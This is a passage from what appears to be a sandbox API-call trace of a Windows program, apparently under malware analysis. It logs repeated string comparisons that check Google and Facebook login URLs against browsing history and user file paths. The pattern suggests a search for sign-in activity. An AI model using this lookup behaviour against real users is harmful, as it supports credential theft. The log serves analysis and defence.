_String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") returned 1 [0085.945] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.946] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.946] wcslen (_String="https://www.google.com/accounts/servicelogin") returned 0x2c [0085.946] wcscmp (_String1="http://www.facebook.com/", _String2="https://www.google.com/accounts/servicelogin") returned -1 [0085.946] wcscmp (_String1="http://www.facebook.com/", _String2=":host: www.google.de") returned 1 [0085.946] wcscmp (_String1="http://www.facebook.com/", _String2=":host: www.msn.com") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="https://www.google.de/") returned -1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="http://www.msn.com/de-de/") returned -1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="https://support.microsoft.com/products/internet-explorer") returned -1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="https://www.microsoft.com/en-us/iegallery") returned -1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="http://www.iegallery.com/en/addons/") returned -1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="https://support.microsoft.com/en-us/products/internet-explorer") returned -1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="http://go.microsoft.com/fwlink/") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="https://support.microsoft.com/internet-explorer") returned -1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="http://www.msn.com/") returned -1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2=":host: computer") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned 1 [0085.947] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", 